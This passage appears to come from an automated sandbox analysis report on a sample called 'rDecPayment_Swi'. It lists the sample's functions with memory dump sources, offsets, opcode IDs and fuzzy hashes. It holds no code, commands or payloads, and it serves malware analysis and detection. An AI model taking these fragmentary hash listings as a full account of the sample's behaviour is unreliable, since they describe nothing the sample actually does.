                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0adf06ce4293f2bdc29a48ad2bafc3707c3df6aa825d7ef34afd9f0c3ce6eaca
                                            • Instruction ID: b6ea441307ae3b2708a371717698e004add6de8c3820dafbee738e7b5df09b6f
                                            • Opcode Fuzzy Hash: 0adf06ce4293f2bdc29a48ad2bafc3707c3df6aa825d7ef34afd9f0c3ce6eaca
                                            • Instruction Fuzzy Hash: FAE0DF3421C204DBC716CF68D60ABAC7B31EB46328F00D099DC8407242CA335E13CB42
                                            Function 05E3C2F7 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 039756fb704c573eb399f24e351316dbcb31dd8be0022a2fd37b28c711334b04
                                            • Instruction ID: 444bcfc15fea289f27af612ff1c9225064e616731210c0962db0c2a3f12760c0
                                            • Opcode Fuzzy Hash: 039756fb704c573eb399f24e351316dbcb31dd8be0022a2fd37b28c711334b04
                                            • Instruction Fuzzy Hash: 69E0C2337440148BEB61E66DB4073E63B92EB852B1F20A466E49E9760ED624C80BCFC1
                                            Function 062296E0 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a559c609447d85bf766da13151376b9e3311bc025e529e9571b2bc776ba694b4
                                            • Instruction ID: bc1f2d8d86aa50c9950081ffe40876dccbe104180e0f477ee6b2003c754be262
                                            • Opcode Fuzzy Hash: a559c609447d85bf766da13151376b9e3311bc025e529e9571b2bc776ba694b4
                                            • Instruction Fuzzy Hash: 0EE01A74E15209EFCB84DFA9D4856ACFBF4EB88304F10C1AADC1893341D6369A41CF80
                                            Function 05E5E038 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e1d72c70d5425ad2fce28b25b9977b650ad5a60b36ec188166e1c90e4eec174
                                            • Instruction ID: 34efff7e10305adc600e8764ed7cde684a99fa274d470192b828ddc6e3dfa1da
                                            • Opcode Fuzzy Hash: 1e1d72c70d5425ad2fce28b25b9977b650ad5a60b36ec188166e1c90e4eec174
                                            • Instruction Fuzzy Hash: 23E01A70D09208EFCB54DFA9D4446ACBBF9EB45315F1081EAC858A3300D7365A51DF40
                                            Function 05E5FA90 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 851b88e5735c1f640486d59784546e813264cf68ff99edf49a1a7664040b7e17
                                            • Instruction ID: 3867e6ab612d068a7ed32c64dd1b04402f93d02b9a5fac31913d616aad61de22
                                            • Opcode Fuzzy Hash: 851b88e5735c1f640486d59784546e813264cf68ff99edf49a1a7664040b7e17
                                            • Instruction Fuzzy Hash: 5DE04674D15208EFC784EFA8C8446ACBBF5AB48214F2080A9CC88D3342E6329E45CB41
                                            Function 05E30410 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6afe97582611db52cf93a68a980639109995c502447eddd7cc774c9b417e0c7
                                            • Instruction ID: dec480b553c303bc047a2c358d07f9956c98872991fe7cfb1f00c7dcd5e3b661
                                            • Opcode Fuzzy Hash: d6afe97582611db52cf93a68a980639109995c502447eddd7cc774c9b417e0c7
                                            • Instruction Fuzzy Hash: F0E08674A09108EBC704DF94D8499ACBB79EB85314F10D199DC4413341D6329E51DB80
                                            Function 05E30120 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6afe97582611db52cf93a68a980639109995c502447eddd7cc774c9b417e0c7
                                            • Instruction ID: d4b427ff723051b133a09355fb555667942fad660b77f273f4e684763e3eeac6
                                            • Opcode Fuzzy Hash: d6afe97582611db52cf93a68a980639109995c502447eddd7cc774c9b417e0c7
                                            • Instruction Fuzzy Hash: BAE08C38909208EFCB04DFA8E8499ACFBB5EB86314F10D1A9DC8423341C6329E52DB80
                                            Function 062286D8 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a49c5500d31e5c9c187657af2c99e89f1e35322c934740af062468df17f42406
                                            • Instruction ID: 232360ff2b30339ea8752a3369ef2019aa4f4bbdf677aa1249c0d3d5920cf423
                                            • Opcode Fuzzy Hash: a49c5500d31e5c9c187657af2c99e89f1e35322c934740af062468df17f42406
                                            • Instruction Fuzzy Hash: F0E09234C18209EFCB44CFA8C4802ACBBB8AB89204F10C0AA8C0853341CA3A9A02CF80
                                            Function 05E5E0B0 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59d26fa585fa835580448814e62ec44f2d3098bef633f861b2ca9e0089dd6038
                                            • Instruction ID: 401741e537c8e8cd8785758c81afd6fd7f7080d7aa4384a4de63dc39e4155848
                                            • Opcode Fuzzy Hash: 59d26fa585fa835580448814e62ec44f2d3098bef633f861b2ca9e0089dd6038
                                            • Instruction Fuzzy Hash: 26E0EC74915208EFC744EFB8D44A69CBBF9AB09225F1051A9DD4993341EA315A50DB41
                                            Function 0622E168 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df9e1f924e6c6f0a82719016b01d197f6c657ae92422ad27d26ed5fcef547276
                                            • Instruction ID: 74ae2e53cea0ff72c607cfe6a0723435cabce3ae2b0270b041fea0584fbb89a3
                                            • Opcode Fuzzy Hash: df9e1f924e6c6f0a82719016b01d197f6c657ae92422ad27d26ed5fcef547276
                                            • Instruction Fuzzy Hash: F1E0C234D19108FFC708DFA8D9405ACBBBAEB85304F50C1ADCC4813341CA329E42DB80
                                            Function 05E5052F Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ff9221ce42b34efafabf383fd05e297d93371e14ebcec37164aa5bb907575c5
                                            • Instruction ID: 9727e60aa4f8ecb9e61f8cfc3de7bed5ae3699ba0198a82ea21518c33df07cd3
                                            • Opcode Fuzzy Hash: 0ff9221ce42b34efafabf383fd05e297d93371e14ebcec37164aa5bb907575c5
                                            • Instruction Fuzzy Hash: 9AE01A30915268AFDB65CF54CD98BEDB7B5BF06310F0022DAD88867281CB301A85CF02
                                            Function 05E32630 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db940d80d5f74edd5a57155b6ffd077bd7e649ad0f34e7f783e7d3c211dff606
                                            • Instruction ID: 8fefed57c57bfac8af53d0b007802f058eb95392a14d5005fed5c27dfde7ea86
                                            • Opcode Fuzzy Hash: db940d80d5f74edd5a57155b6ffd077bd7e649ad0f34e7f783e7d3c211dff606
                                            • Instruction Fuzzy Hash: 4ED0C777954109D7EF104198AC0BBDCF725EB80775F5443E3F2ACE51C1E6515051D154
                                            Function 05E30DC8 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34cae0fa78d4f9388067cf3fd00139bf005f44e5ecedaf7f27ef296105b128b7
                                            • Instruction ID: 003c2ce08a01f0a15e290322d45ec083c8f7376ab90961b7355664f025c92bbc
                                            • Opcode Fuzzy Hash: 34cae0fa78d4f9388067cf3fd00139bf005f44e5ecedaf7f27ef296105b128b7
                                            • Instruction Fuzzy Hash: C1E01230A40209EFDB04EFB5EE45B6EB7BAEF84204F5085A9E805D7344DE716F049791
                                            Function 05E30D80 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 26d41c5cd2c3adcd321f6d8720834fcc73fb79106821aefde0284d4908f1e7aa
                                            • Instruction ID: 7b77c8fb02d03b1790ab0c9d66bfbc4e1e9157086d3c9d9c068aa15465bbab35
                                            • Opcode Fuzzy Hash: 26d41c5cd2c3adcd321f6d8720834fcc73fb79106821aefde0284d4908f1e7aa
                                            • Instruction Fuzzy Hash: D7E01230A01109EFCB00EFB8E941A9E7BFAEB45344F1041A9E409D3345DA716F049791
                                            Function 05E3E7A0 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 502faa821905c4ddfa2d0d8981f7acc36ad9bb086b66ebc5cbac60390b3ba637
                                            • Instruction ID: d61bc9e55cf4a80cc2fe7edba73674f77de0d984e42a1b52474fbe21d67b4256
                                            • Opcode Fuzzy Hash: 502faa821905c4ddfa2d0d8981f7acc36ad9bb086b66ebc5cbac60390b3ba637
                                            • Instruction Fuzzy Hash: 2DD0C9BA011224EFC3408B69E805E517B68FB0C224F544465F64487231CA35AC10CB64
                                            Function 05E58402 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c603830c3cc66c877483a8f26c916f748ed296f153a3ec408b6809e13d105c6a
                                            • Instruction ID: fe675618d535347a6bb15f8c46a82a94fd21ee75ff39f3736dc1f3edbd3b28a3
                                            • Opcode Fuzzy Hash: c603830c3cc66c877483a8f26c916f748ed296f153a3ec408b6809e13d105c6a
                                            • Instruction Fuzzy Hash: 64D017706043298FCB95EF25D898A9E7BB9EB41204F106A9584496324CDF744A85CF01
                                            Function 05E577B1 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46a8e51f537799ce7bcddab18b9dac984b9f2cba17bfeb7ce4629030a3edc9f8
                                            • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                            • Opcode Fuzzy Hash: 46a8e51f537799ce7bcddab18b9dac984b9f2cba17bfeb7ce4629030a3edc9f8
                                            • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                            Function 05E5728B Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b4381a54878f41e7e17302edd3ab968dad4fd47bb6c80183f0260553a5d4fd9
                                            • Instruction ID: 683ddf90d361ce7d957d41118ac6384b848bcfadab5852b741d0285a2695dc9a
                                            • Opcode Fuzzy Hash: 3b4381a54878f41e7e17302edd3ab968dad4fd47bb6c80183f0260553a5d4fd9
                                            • Instruction Fuzzy Hash: 1ED0E974D05228CFDB64DF24D844B99BBB1BB45310F5091D5E84DA3650DB341AC4CF15
                                            Function 05E35530 Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7797a2b534b2bae89e5a46edf930cd806c5448a4e26016884788b7f1ed4f2bc
                                            • Instruction ID: 6cd903012c5b7c25c96656f4c6cd85873f26b99f5be74a8163198658c5ad6c3b
                                            • Opcode Fuzzy Hash: d7797a2b534b2bae89e5a46edf930cd806c5448a4e26016884788b7f1ed4f2bc
                                            • Instruction Fuzzy Hash: 99C08CB32185928FE6028F22C4261C3BF21FB50301702858398018A551C620582AC62A
                                            Function 05E3E7B0 Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                            Function 05E3C2E0 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80e2c0fb336d1769e3bc6c17527396d287523d6f50c4ca99d7a40011cd6d5bf7
                                            • Instruction ID: 59d00d0e958a41580defaff0bceabc40e5402c7a64c404949310b390b6ab928c
                                            • Opcode Fuzzy Hash: 80e2c0fb336d1769e3bc6c17527396d287523d6f50c4ca99d7a40011cd6d5bf7
                                            • Instruction Fuzzy Hash: A5B00138622300CFFB806F1AB84B3983765BF646A8FD0E1B5D4D2521218F694F22DE90

                                            Non-executed Functions

                                            Function 05E350A8 Relevance: 2.8, Strings: 2, Instructions: 330COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (aq$,aq
                                            • API String ID: 0-1929014441
                                            • Opcode ID: 3751d943bf2a748921328e87f274ea792690f246f5a8835fa69164b1b5e40e3e
                                            • Instruction ID: 380030662d35ae88aa63c8108fc2cc0c121a6412e7c85238a9ec49a3958ca40b
                                            • Opcode Fuzzy Hash: 3751d943bf2a748921328e87f274ea792690f246f5a8835fa69164b1b5e40e3e
                                            • Instruction Fuzzy Hash: 04D12834A00605CFDB14CF69C589AAEB7F2BF88315F25D4AAE4469B366DB34EC41CB50
                                            Function 05E50040 Relevance: 2.6, Strings: 2, Instructions: 104COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ;$w
                                            • API String ID: 0-3908490842
                                            • Opcode ID: 088c327fdd58595b115d6e72c178283242db544a83d4e247443879a9718baf14
                                            • Instruction ID: 6abacb61a2fd2c344179bbf21b6f339eda80e9087da7b6428517b7dd84cf3c20
                                            • Opcode Fuzzy Hash: 088c327fdd58595b115d6e72c178283242db544a83d4e247443879a9718baf14
                                            • Instruction Fuzzy Hash: 8D41E771D146688BEB69CF6BCC4479AB7FBBBC8304F04D1AA984CA6254DB740A81CF00
                                            Function 05C15831 Relevance: 2.0, Instructions: 2009COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334027054.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                            • Associated: 00000000.00000002.2334451924.0000000005D50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5c10000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc893487d0c2aaf44d175f8b3c9a4059db04b076dd48653336fedde15f333d67
                                            • Instruction ID: 25bfdebf83e07d0231a8cf79fae2b420ec0e18a694d3acb145016dafb6bc8227
                                            • Opcode Fuzzy Hash: cc893487d0c2aaf44d175f8b3c9a4059db04b076dd48653336fedde15f333d67
                                            • Instruction Fuzzy Hash: 970368924AE3D05FD31387B41879A91BFB69E17214B1E89CBC8C1CF0A7D14A5A59E333
                                            Function 05E306D8 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 4668e414f083ccd92d7784796b9cf441661375b874e2f596f5a627143eddaa2a
                                            • Instruction ID: 5184dc1100ca21a2d446a9373c32c49b6b28a363d4ab6f06ffa64fe9ae2469d5
                                            • Opcode Fuzzy Hash: 4668e414f083ccd92d7784796b9cf441661375b874e2f596f5a627143eddaa2a
                                            • Instruction Fuzzy Hash: A7A1C874E0521CCFEB54DFAAD849BEEBBF2BB89304F1090A9D489A7255EB345945CF00
                                            Function 05E306C8 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: be5823d8b8e464d0e6d0276fddab9fb201e9919e490edeedb9d23c90c87beb81
                                            • Instruction ID: 31711502a32b1e3e33eb2d6cff22bfa1dab5fdeef13b9b4f2c1638a21000c952
                                            • Opcode Fuzzy Hash: be5823d8b8e464d0e6d0276fddab9fb201e9919e490edeedb9d23c90c87beb81
                                            • Instruction Fuzzy Hash: 7EA1C674E05218CFEB54DFAAD849BAEBBF2BB89304F10D0AAD449A7355EB345945CF00
                                            Function 060D7478 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: daq
                                            • API String ID: 0-1532007458
                                            • Opcode ID: 35573eede691dfcca0736e76d4bffc814c72da0bf293fd00ac684f215fe2fcac
                                            • Instruction ID: 566e30513b3580315c9faae44cfa0c57699c829469c20b2cea895ab8937df3ea
                                            • Opcode Fuzzy Hash: 35573eede691dfcca0736e76d4bffc814c72da0bf293fd00ac684f215fe2fcac
                                            • Instruction Fuzzy Hash: 59915774E41218CFDB54EF69D845B9EBBF2FF49300F10826AD449A7298DB345A86CF41
                                            Function 060D7488 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: daq
                                            • API String ID: 0-1532007458
                                            • Opcode ID: 838aa42bcb59d678e37a9b0f258161c1223230b2016c34e31d3d7b4f889e4a70
                                            • Instruction ID: 0ba3a44cd828f69e5d26180e5cca2c7965dbd2003e792c30e236c7e16ee0781c
                                            • Opcode Fuzzy Hash: 838aa42bcb59d678e37a9b0f258161c1223230b2016c34e31d3d7b4f889e4a70
                                            • Instruction Fuzzy Hash: 7E917974E45218CFDB54EF6AD844BADBBF2FF49300F108269D449A3298DB745986CF41
                                            Function 01162248 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2313440096.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1160000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: J
                                            • API String ID: 0-1141589763
                                            • Opcode ID: ce257f6930c0c43641047323c337bea4db0bb714166577b7420e8def4e420b28
                                            • Instruction ID: b18f60b28f405b9273baa3f8c786ed025716c4b4933301a33ec765c38a3dd70a
                                            • Opcode Fuzzy Hash: ce257f6930c0c43641047323c337bea4db0bb714166577b7420e8def4e420b28
                                            • Instruction Fuzzy Hash: 7C617AB1D056188BEB6CCF6BCD446C9FAF3AFC9300F04C0EA994DA6214EB751A858F41
                                            Function 05E5A88A Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: v
                                            • API String ID: 0-1801730948
                                            • Opcode ID: 2cdfb76996caff62cacffafc056491544e9ab7537550cc55ecc5d2acee5f7cda
                                            • Instruction ID: a6f06d5af9bc330f11baa4cfc639e9a2d31c2f2ef1619dd518ac2e600cd0757f
                                            • Opcode Fuzzy Hash: 2cdfb76996caff62cacffafc056491544e9ab7537550cc55ecc5d2acee5f7cda
                                            • Instruction Fuzzy Hash: 34613A70E142288FDBA4CF68C8857CDBBF1BF48314F5081E9D49CE6215DB70AA998F40
                                            Function 05E50006 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: w
                                            • API String ID: 0-476252946
                                            • Opcode ID: e6fb63015ffa3631c65060af37e4a51d471879d97dd2ab7919689065d3de67bd
                                            • Instruction ID: 88854978622ad6545f8ad43d178bce9ed232e5dc1c6f17aee8d5a5b7e529fcf3
                                            • Opcode Fuzzy Hash: e6fb63015ffa3631c65060af37e4a51d471879d97dd2ab7919689065d3de67bd
                                            • Instruction Fuzzy Hash: D9310CB1D057558FE71ACF6B8C50699BBF7AFC5300F08D0FAD848AA265EB740A418F10
                                            Function 06210040 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T
                                            • API String ID: 0-3187964512
                                            • Opcode ID: 4f6df3ad9b9fbbb78af5f45005357f37d82aa2ecff9739fff2ec78a5f2f5dcd6
                                            • Instruction ID: 9762653611d42c8e168866103fa750bb875c34ae1b979298ae8edddddc9bff45
                                            • Opcode Fuzzy Hash: 4f6df3ad9b9fbbb78af5f45005357f37d82aa2ecff9739fff2ec78a5f2f5dcd6
                                            • Instruction Fuzzy Hash: AD41DA71D156298FEB28CF6AC944799F6F6AB89300F00C1EAE90CA7214DB744AC5DF51
                                            Function 06210007 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
